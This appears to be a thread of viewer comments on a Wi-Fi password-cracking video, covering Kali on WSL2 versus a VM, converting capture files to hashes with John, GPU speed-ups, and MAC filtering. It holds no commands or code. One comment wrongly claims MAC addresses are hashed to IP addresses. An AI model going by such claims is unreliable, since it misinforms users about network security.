You pretty much nailed it on the head. :)
Are we getting setup tour anytime soon ? 😁
How did you move the file to your windows computer, retrieve file and how did you get to the terminal on your computer?
As soon as you add uppercase and symbols the time to crack will blow out to a million years
I find this intersting moreover because the default password on a sky router was 8 digits made up of upper, lower and numericals however when I tested this.. simple method really I had my password in front of me after about 8 minutes. Long story short, if someone want's into your Wi-Fi bad enough there's no real stopping it unless you manually set your password to 16+ digits and most people overlook this as they are convinced that upper/lower/numerical passwords are so strong and secure, until they see how easy a brute force can be!
I am back to your channel after one year. Where can I do testing? Can you suggest me any site?
Would a duel gpu setup make it faster?
David- Thank you! This is such a helpful video. I appreciate all of the content and knowledge your passing along in the cyber security.
I did have a question, how do you set up the alfa wifi adapter for WSL2 running on windows 11?
Good luck getting WSL to recognize any USB devices. After some googling, some places say it's possible. Others say it can't. I tried, and have settled on USB devices dont pass through to kali on WSL.
Easy solution: Just use a virtual machine like VMware and install kali on it for network hacking. Use WSL2 Kali for everything else.. which ultimately means having 2 kali machines, which then out of laziness defaults to just using the virtual machine Kali and never touching WSL again.
TLDR: Ditch WSL and stick to a VM to keep it simple.
Is Meraki still requiring subscriptions?
A question: doesnt mac filtering make it safe enough for you ? Or you can be still be a victim of sniffers?
To my knowledge, MAC addresses are essentially hashed to IP addresses, so someone with the same IP address as a prohibited MAC address could possibly exploit this. A better way of handling this may be through using data analytics to determine whether a connection involves normal Internet traffic or has malicious intent or something like CloudFlare’s DDoS protection.
Great video!!! What about WPA-E using SSL certificates?
you don't need a monitor that is 7 miles wide
😅
Hey David, Which machine and configuration you use for full time hacking exercise. What would be good enough
Did you convert the .cap file into hash using John?
How many enemies do you have if you're scared about people logging into your router. Lmfao.
david you should do tours brother id love to go and meet ya
Thank you for this info!
Hello, I have a question. Since even more complex passwords can be cracked, then is worth to add MAC filtering on router to secure yourself in this way?
The way you teach and reach millions of people you will easily reach the 1mil subs.
Thank you thank you thank you
I love this man's persistence
Good content. Thanks for posting.
I’m hoping to access my ‘Yi iot’ ip camera and redirect video output to my own cloud backup